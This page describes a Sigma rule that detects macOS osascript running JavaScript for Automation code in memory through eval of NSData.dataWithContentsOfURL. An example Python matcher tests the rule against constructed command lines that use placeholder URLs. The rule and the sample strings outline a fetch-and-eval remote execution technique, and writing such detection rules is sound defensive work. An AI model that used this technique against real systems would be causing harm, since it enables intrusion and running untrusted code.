
JXA In-memory Execution Via OSAScript

Detects possible malicious execution of JXA in-memory via OSAScript

Author: Sohan G (D4rkCiph3r)
Created: Tue Jan 31
Rule ID: f1408a58-0e94-4165-b80a-da9f96cf6fc3
Platform: macos
Log Source
Product: macOS (raw: macos)
Category: Process Creation (raw: process_creation)

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic (2 selectors)
detection:
    selection_main:
        CommandLine|contains|all:
            - 'osascript'
            - ' -e '
            - 'eval'
            - 'NSData.dataWithContentsOfURL'
    selection_js:
        - CommandLine|contains|all:
              - ' -l '
              - 'JavaScript'
        - CommandLine|contains: '.js'
    condition: all of selection_*
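To make the two selectors concrete, here is an added Python example (not code from this page, the Sigma project, or the rule author) that applies the rule's logic to a handful of constructed process-creation events. It mirrors the structure above: selection_main is a single contains|all over four substrings, selection_js is a list of two alternatives (contains|all of ' -l ' and 'JavaScript', or contains '.js'), and the condition requires both selectors. Sigma string matching is case-insensitive by default, so both sides are lowercased before comparison. The event field names and sample command lines are assumptions constructed for the example.

```python
from dataclasses import dataclass

# Substrings copied from the rule. selection_main is one contains|all list.
MAIN_ALL = ("osascript", " -e ", "eval", "NSData.dataWithContentsOfURL")
# selection_js is a list, i.e. an OR of two alternatives:
#   1) contains|all of these two substrings
JS_LANG_ALL = (" -l ", "JavaScript")
#   2) or a single contains of this substring
JS_EXT = ".js"


@dataclass
class ProcessEvent:
    """Minimal process-creation event; field names are an assumption."""
    image: str
    command_line: str


def contains_all(haystack: str, needles: tuple) -> bool:
    """Sigma 'contains|all': every needle must appear (case-insensitive)."""
    h = haystack.lower()
    return all(n.lower() in h for n in needles)


def contains(haystack: str, needle: str) -> bool:
    """Sigma 'contains': single substring, case-insensitive."""
    return needle.lower() in haystack.lower()


def selection_main(ev: ProcessEvent) -> bool:
    return contains_all(ev.command_line, MAIN_ALL)


def selection_js(ev: ProcessEvent) -> bool:
    # List-valued selection: any one list item matching is enough.
    return contains_all(ev.command_line, JS_LANG_ALL) or contains(ev.command_line, JS_EXT)


def matches_rule(ev: ProcessEvent) -> bool:
    # condition: all of selection_*
    return selection_main(ev) and selection_js(ev)


# Constructed sample events. The command lines are deliberately non-functional
# placeholders that only exercise the rule's substrings.
SAMPLE_EVENTS = [
    # 1) hits selection_main and the '-l JavaScript' alternative of selection_js
    ProcessEvent("/usr/bin/osascript",
                 'osascript -l JavaScript -e "eval(NSData.dataWithContentsOfURL(PLACEHOLDER_URL))"'),
    # 2) hits selection_main and the '.js' alternative (no -l flag)
    ProcessEvent("/usr/bin/osascript",
                 'osascript -e "eval(NSData.dataWithContentsOfURL(PLACEHOLDER_URL))" /tmp/loader.js'),
    # 3) benign AppleScript: selection_js fails and selection_main fails
    ProcessEvent("/usr/bin/osascript",
                 'osascript -e \'display dialog "hello"\''),
    # 4) JXA one-liner without eval/NSData: selection_js hits, selection_main fails
    ProcessEvent("/usr/bin/osascript",
                 "osascript -l JavaScript -e 'console.log(1)'"),
    # 5) unrelated process
    ProcessEvent("/usr/bin/curl", "curl -s https://example.invalid/"),
]


def scan(events: list) -> list:
    """Return the command lines of events that satisfy the full rule condition."""
    return [ev.command_line for ev in events if matches_rule(ev)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

Two points worth keeping in mind when triaging hits from this rule: the ' -e ' and ' -l ' substrings are space-padded, so a command line where those flags are glued to their argument (or appear at the very end of the string) will not match, and the '.js' alternative matches any path or argument containing that substring, not only a script file.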
False Positives
Unknown

False positive likelihood has not been assessed. Additional context may be needed during triage.

Rule Metadata
Rule ID
f1408a58-0e94-4165-b80a-da9f96cf6fc3
Status
test
Level
high
Type
Detection
Created
Tue Jan 31
Path
rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml
Raw Tags
attack.t1059.002, attack.t1059.007, attack.execution